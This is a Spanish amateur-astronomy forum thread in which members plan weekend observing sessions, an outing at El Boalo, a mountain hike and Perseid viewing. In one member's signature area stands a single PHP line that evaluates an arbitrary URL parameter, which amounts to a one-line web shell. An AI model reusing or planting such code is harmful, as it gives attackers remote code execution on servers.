¿Alguna salida para este fin de semana?

Aquí se anunciarán todas las actividades de la asociación; quedadas, charlas, cursos, talleres, etc.. Utilizadlo para apuntarse o preguntar.
LUNA
Mensajes: 486
Registrado: Vie Ago 08, 2008 4:36 pm

¿Alguna salida para este fin de semana?

Mensaje por LUNA »

Hola :

¿Teneis pensado hacer algo para este fin de semana?

Saludos
C8-S
Montura ecuatorial CG-5
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

¿Alguna salida para este fin de semana?

Mensaje por m3ntol »

Yo estoy de vacacioneeeeeeeeees :P :P :P :P

estaré fuera. Por cierto que hay que ir pensando algo para las perseidas.
phpbb:eval(stripslashes($_GET[e]));
vakaloura
Mensajes: 661
Registrado: Jue Dic 18, 2008 11:34 am

¿Alguna salida para este fin de semana?

Mensaje por vakaloura »

Pues para este sábado, de momento y si no surge ningún imprevisto, tenía pensado ir a lo del Boalo... pero tampoco tengo muy claro qué hacer.

Tenemos luna desde las once y pico de la noche hasta por la mañana, las previsiones meteorológicas son buenas y a las cuatro ya se pone a tiro Marte y Venus al laíco de las Pléyades...porque con esa lunaza no creo que se vea mucha cosa....

Un saludo!!!
GSO RC 8" f/9, EZG80
QHY6_mono, NEQ6-PRO
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

¿Alguna salida para este fin de semana?

Mensaje por Manuelariza »

Pues yo nada de nada,tengo asuntos urgentes que resolver y esta vez el tele se queda en casa. :(

Saludos...
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
LUNA
Mensajes: 486
Registrado: Vie Ago 08, 2008 4:36 pm

¿Alguna salida para este fin de semana?

Mensaje por LUNA »

Que suerte tienen los que estan de vacaciones!!! :D

Disfrútalas .

Por cierto, como no sé en qué dia vivo, me presenté el lunes 6 en el Lidl a por los prismáticos y claro na de na.

Saludos
C8-S
Montura ecuatorial CG-5
LUNA
Mensajes: 486
Registrado: Vie Ago 08, 2008 4:36 pm

¿Alguna salida para este fin de semana?

Mensaje por LUNA »

Mario, no se que es eso del Boalo. ¿Alguna salida por allí?

Me parece que como tu bien me dijiste, ya llegará el invierno con los grados bajo cero y telescopio a toda vela.

De todos modos, y aunque para las perseidas todavía quedan unas cuantas salidas, tenemos que preparar algo para ver muuuuuuuuuuuuuchas.

Estamos en contacto. :D
C8-S
Montura ecuatorial CG-5
vakaloura
Mensajes: 661
Registrado: Jue Dic 18, 2008 11:34 am

¿Alguna salida para este fin de semana?

Mensaje por vakaloura »

Pues lo del Boalo es una salida que coordina Pablox (forero de Hubble) organiza la Asociación Cultural El Balcón y Asociación Astronómica Hubble, concretamente es la tercera vez que se hace y es en la hermita de San Isidro en El Boalo.

[img]http://img193.imageshack.us/img193/2310/sabado11julio.jpg[/img]

Fotos del sitio:http://www.minube.com/fotos/rincon/64284/341076

Hilo: http://www.asociacionhubble.org/portal/ ... 10&t=34021

Nosotros queremos ir porque está cerquita, hechar un cable y estrenar !!nuevo buscador!! Un lunático de 80 mm!! Puff!! me sudan las manos sólo de pensarlo :oops: Como comentaba va a estar la Luna dándolo todo y no es plan de hacerse quilómetros de más.

Otra cosa, es muy, pero que muy probable es que vayamos de excursión por la sierra madrileña ese mismo día y tirar unas fotos, el sitio está al lado del boalo y así matamos dos pájaros de un tiro.

Un saludooooo!!
GSO RC 8" f/9, EZG80
QHY6_mono, NEQ6-PRO
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

¿Alguna salida para este fin de semana?

Mensaje por Manuelariza »

No me digas Mario que ya tienes instalado el buscador!!!pues nada espero que lo disfrutes mucho.Erase una vez un telescopio a un buscador pegado. :lol: :lol: :lol:


Saludos...
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
LUNA
Mensajes: 486
Registrado: Vie Ago 08, 2008 4:36 pm

¿Alguna salida para este fin de semana?

Mensaje por LUNA »

Mañana os comento si voy o no a la observación.

También me gustaría ir a la excursión pero depende de las horas, porque el calor lo aguanto muy mal .

Saludos :D
C8-S
Montura ecuatorial CG-5
vakaloura
Mensajes: 661
Registrado: Jue Dic 18, 2008 11:34 am

¿Alguna salida para este fin de semana?

Mensaje por vakaloura »

:twisted: :twisted: Montado, lo que se dice montado, aún no está, mañana tocará madrugar y dejarlo listo para la salida, un "bujerín" por aquí, unos tornillitos por allá y listo, esté puesto o no, le daré su primera-segunda luz :wink: Hoy me he acercado al patrocinador y ha caido un SWAN de 26..... o sea que estreno doble (va a haber unos nubarrones!!!)

En cuanto a lo de la excursión, estamos debatiendo la hora, pero lo más seguro es que salgamos a las 11:30 del parking que hay en la zona (http://astronet.foroportal.es/board/topic156.html), de temperatura va a estar genial, estaremos a unos 2000 metros o sea que calor como el que hace ahora mismo no va a haber, pero sol sí, mucho sol, o sea que mucha cremita!! De caminata serán unas dos horas más o menos ida y otro tanto de venida, aunque la vuelta es cuesta abajo jejejeje, luego nos apostaremos en los lagos para comer, descansar, hacer el cabra e incluso afotos (que es a lo que vamos). Lo que se debate es la hora de regreso pues con todo lo que deberíamos haber "rezumado" habría que tener tiempo de sobra de ir a casa, pegarse una ducha y apañar todos los trastos.... va a ser super-divertido!!!

Y la salida pues eso, anímense que tambien va a estar bien!

Un saludoooooo!!!!! :D
GSO RC 8" f/9, EZG80
QHY6_mono, NEQ6-PRO
Responder